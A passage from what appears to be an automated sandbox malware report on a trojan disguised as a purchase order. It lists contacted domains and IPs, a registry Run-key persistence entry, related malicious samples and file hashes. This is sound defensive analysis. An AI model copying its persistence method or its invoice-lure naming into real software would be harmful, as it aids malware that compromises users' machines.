                                            https://sectigo.com/CPS0D08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-19953308042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-19959008042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://myliverpoolnews.cf08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.liverpool.com/all-about/transfers08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://reach-id.orbit.tm-awx.com/analytics.js.gz08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-1716486808042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-117808042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            172.67.150.212
                                            		myliverpoolnews.cfUnited States
                                            		13335CLOUDFLARENETUSfalse

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:31.0.0 Emerald
                                            Analysis ID:383917
                                            Start date:08.04.2021
                                            Start time:12:23:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 13m 1s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:08042021New-PurchaseOrder.bat (renamed file extension from bat to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:40
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal96.troj.evad.winEXE@35/25@2/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 23.5% (good quality ratio 21.5%)
                                            • Quality average: 78%
                                            • Quality standard deviation: 31.2%
                                            HCA Information:
                                            • Successful, ratio: 83%
                                            • Number of executed functions: 154
                                            • Number of non-executed functions: 170
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.54.113.53, 168.61.161.212, 52.147.198.201, 67.26.83.254, 8.241.82.126, 8.238.36.254, 8.241.78.126, 8.253.207.121, 104.43.193.48, 40.88.32.150, 52.255.188.83, 95.100.54.203, 20.82.209.183, 23.0.174.200, 23.0.174.185, 23.10.249.43, 23.10.249.26, 20.54.26.129, 20.50.102.62
                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383917/sample/08042021New-PurchaseOrder.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:24:32API Interceptor1x Sleep call for process: WerFault.exe modified
                                            12:24:36API Interceptor535x Sleep call for process: 08042021New-PurchaseOrder.exe modified
                                            12:24:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SWqTT C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                            12:24:52API Interceptor51x Sleep call for process: powershell.exe modified
                                            12:24:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SWqTT C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            172.67.150.212ETL_126_072_60.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC5277A9663FCE09586170F6A51B96A2.html
                                            IMG_102-05_78_6.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C6853B6BC65431464628FF23B3F0F335.html
                                            ACdEbpiSYO.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
                                            Invoice_ord00000009.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8CB85A57C5722245E360D575B497E6CC.html
                                            kayo.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-867E80DBC8FFAEC73AC7FD4FE1DA1A1B.html
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
                                            DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E073BCECB8DFC74A5738D8B1C32D8436.html
                                            234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8F0F96D3333F94679C552F5DEB9CE2AF.html
                                            items list.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
                                            Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-D1FD69143FEE625518220B28083FA2F9.html
                                            SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-09750D54320914EBBBA77235AE2BC46B.html
                                            RFQ #46200058149.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FE6EFB3AED9F05224C930BEF8BE1CC20.html
                                            Payment Slip E05060_47.docGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3764A540BD56887B40989BBA8472B701.html
                                            New Orders.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-28D56F639751140E7A008217BE126C8D.html
                                            DHL_document11022020680908911.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html
                                            BL8846545545363.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B7B18D8B53846C51E3D2182818196100.html
                                            BL84995005038483.exeGet hashmaliciousBrowse
                                            • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-994F3BB06F4A7FE8F60B83F74A076F10.html

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            myliverpoolnews.cfETL_126_072_60.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            IMG_102-05_78_6.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            lfQuSBwdSf.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            RFQ-034.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            ACdEbpiSYO.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            Invoice_ord00000009.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            kayo.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            BL01345678053567.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            20200804-8293847pdf.scr.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            items list.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            SKMC25832100083932157.jarGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PO75773937475895377.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            New Order.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exeGet hashmaliciousBrowse
                                            • 172.67.150.212

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            CLOUDFLARENETUSETL_126_072_60.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            IMG_102-05_78_6.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            MT103_YIU LIAN08042021_Xerox Scan_202104_.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            PO4308.exeGet hashmaliciousBrowse
                                            • 104.21.49.158
                                            pumYguna1i.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            gqnTRCdv5u.exeGet hashmaliciousBrowse
                                            • 104.21.65.7
                                            Calt7BoW2a.exeGet hashmaliciousBrowse
                                            • 104.21.48.10
                                            0BAdCQQVtP.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            lfQuSBwdSf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            TazxfJHRhq.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            AQJEKNHnWK.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            hvEop8Y70Y.exeGet hashmaliciousBrowse
                                            • 172.67.219.254
                                            RFQ-034.exeGet hashmaliciousBrowse
                                            • 104.21.56.119
                                            ACdEbpiSYO.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            Invoice_ord00000009.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            kayo.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            nicoleta.fagaras-DHL_TRACKING_1394942.htmlGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            000OUTQ080519103.pdf.exeGet hashmaliciousBrowse
                                            • 172.67.164.131

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            54328bd36c14bd82ddaa0c04b25ed9adMT103_YIU LIAN08042021_Xerox Scan_202104_.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            lfQuSBwdSf.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            RFQ-034.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            ACdEbpiSYO.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            Invoice_ord00000009.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            kayo.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            RFQ 100400806 SUPPLY.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            new_order20210408_14.docGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            BL01345678053567.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            SER09090899.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            PURCHASE ORDER-34002174,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            cricket.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            20200804-8293847pdf.scr.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            SKMC25832100083932157.jarGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            EMPRESA SUMPEX TRADE.exeGet hashmaliciousBrowse
                                            • 172.67.150.212
                                            Yeni siparis _WJO-001, pdf.exeGet hashmaliciousBrowse
                                            • 172.67.150.212

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeRFQ-034.exeGet hashmaliciousBrowse
                                              Payment Slip.exeGet hashmaliciousBrowse
                                                Revised Invoice No CU 7035.exeGet hashmaliciousBrowse
                                                  Sales_Order description.exeGet hashmaliciousBrowse
                                                    Outstanding invoices.exeGet hashmaliciousBrowse
                                                      Q88_Bulk Carrier.exeGet hashmaliciousBrowse
                                                        Payment _Slip copy.exeGet hashmaliciousBrowse
                                                          MV. HUA KAI V-2023.exeGet hashmaliciousBrowse
                                                            Order_April shipment.exeGet hashmaliciousBrowse
                                                              INVOICE for Order PIEX310113978.exeGet hashmaliciousBrowse
                                                                Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                                                  TT SWIFT COPY.exeGet hashmaliciousBrowse
                                                                    PO75773937475895377.exeGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exeGet hashmaliciousBrowse
                                                                        Download Report.06.05.2021.exeGet hashmaliciousBrowse
                                                                          Outstanding invoices.exeGet hashmaliciousBrowse
                                                                            IMG_767893434432.exeGet hashmaliciousBrowse
                                                                              VMtEguRH.exeGet hashmaliciousBrowse
                                                                                SHIPPING DOCS - MV. SN QUEEN.exeGet hashmaliciousBrowse
                                                                                  MT CAPE AZALEA V219 PENAVICO 13-10-20.exeGet hashmaliciousBrowse

                                                                                    Created / dropped Files

                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_08042021New-Purc_27713ebec8c220f2d5c09c5ea843cd62601d18_a44221a1_197a503e\Report.wer
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):17810
                                                                                    Entropy (8bit):3.76111653919658
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:JVWG2858mHBUZMXSaKQqueZiAr/u7sHS274ItrID:a859BUZMXSaFmD/u7sHX4ItrID
                                                                                    MD5:AF4E1C227B0751BF1A53848C9F03A9E6
                                                                                    SHA1:DC534378D22964114EEAAFAF7A386E17ED6956A2
                                                                                    SHA-256:A8579E2D19A25EA28420219C22800E67AC709339BBFAD9B4452F071C8D6245FB
                                                                                    SHA-512:E6E0347F43F7E4212DA8047A0691AC3517FBE69831A76EB2812401BBB134C3BA563BD0665C384378B36AC6EDF86C7151C05CEBD40BAE5E67A1F48CD32C196AB4
                                                                                    Malicious:false
                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.8.3.4.6.6.6.5.0.6.8.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.8.3.4.7.0.8.3.8.1.6.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.0.a.5.8.b.3.-.2.9.a.2.-.4.f.9.b.-.8.9.3.8.-.1.5.8.b.8.4.7.8.1.5.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.a.9.2.e.4.f.-.e.7.0.9.-.4.7.9.5.-.a.d.9.8.-.d.7.9.8.3.7.b.9.f.1.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.0.8.0.4.2.0.2.1.N.e.w.-.P.u.r.c.h.a.s.e.O.r.d.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.m.b.o.n.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.5.8.-.0.0.0.1.-.0.0.1.7.-.7.b.9.7.-.1.0.b.3.a.c.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.4.9.0.5.2.9.4.d.a.f.2.3.9.d.d.6.1.4.2.d.1.0.9.e.1.c.d.0.1.f.b.0.0.0.0.0.0.0.0.!.0.0.0.0.0.e.f.4.2.4.d.2.0.0.0.f.1.8.e.6.b.8.3.
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A64.tmp.dmp
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Thu Apr 8 19:24:28 2021, 0x1205a4 type
                                                                                    Category:dropped
                                                                                    Size (bytes):216131
                                                                                    Entropy (8bit):4.277177437167617
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:K9gIOgF5D0IUCgU/OMonDD0Jjd+pLnLqmIQ8AC:K9RpDDLTj1+n0+pbQ
                                                                                    MD5:76DAA92CA9E2F639D4A568D2A4D70E64
                                                                                    SHA1:94D20601C7B055218717B090681CF098B84CB54B
                                                                                    SHA-256:2D78C048DC77E027A8F20DBCA16AA6D7EFAB2839F61CE8184A7B57DFFBCF8926
                                                                                    SHA-512:8C6F28A50D4E07A10B0D0739D82CEA7DD0D6A51A715D2593BD0856980A9C41E71DD889225AD17238CAF35766EB62B8516298ACFE40781B802A1F1A7800E636A3
                                                                                    Malicious:false
                                                                                    Preview: MDMP....... .......lXo`...................U...........B......t2......GenuineIntelW...........T.......X...DXo`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER48CD.tmp.WERInternalMetadata.xml
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8464
                                                                                    Entropy (8bit):3.691990666806616
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Rrl7r3GLNi1wx6a4N6YSCSUB6r9BagmfZGSJCpr589bqnosf0lTum:RrlsNi1O636YXSUB6qgmfESHqnbfg
                                                                                    MD5:2EE7D828681FD55EEB4F8891CD796B2A
                                                                                    SHA1:EFD9CE3F378CDC328073951F1ECB3991E236BBE2
                                                                                    SHA-256:CE5351E5E76808C0B7092BDAEB352E9580361AD4105E0FBD159CF88356D2B910
                                                                                    SHA-512:D8ABBCFEDE9CC145CA3F79ED1D873BF39720D004D9CCBFE7AE062E7E9B67DF0F7F924929AE96E3BF6F2A3DB6798131BC1059520700A63592FB0403D079EDBC12
                                                                                    Malicious:false
                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.5.2.<./.P.i.d.>.......
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A06.tmp.xml
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4825
                                                                                    Entropy (8bit):4.497489010071743
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9e4WSC8BY8fm8M4JyFFJT+q8vjTnEM6b3/5dd:uITfk1xSNHJEKfnEM6D5dd
                                                                                    MD5:2AB29E9A09B790218331EC3C4CEE857A
                                                                                    SHA1:9CAA69CF504EBEE2B77AA77B68EAA3C6E6104103
                                                                                    SHA-256:6CCEC29B8813A4EE4751818F0C609B4B964995A8C96F7D908D2A5DFAC9E15E06
                                                                                    SHA-512:7C2067CCE77DE292366EBD378F09C46769A5BFF6211177D6FE3403FCB899DA1CBD03216EBF04AADAD73108951FBEAE097C8B850576D68ACD13279F01BF5EBD85
                                                                                    Malicious:false
                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937715" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                    Category:dropped
                                                                                    Size (bytes):58596
                                                                                    Entropy (8bit):7.995478615012125
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
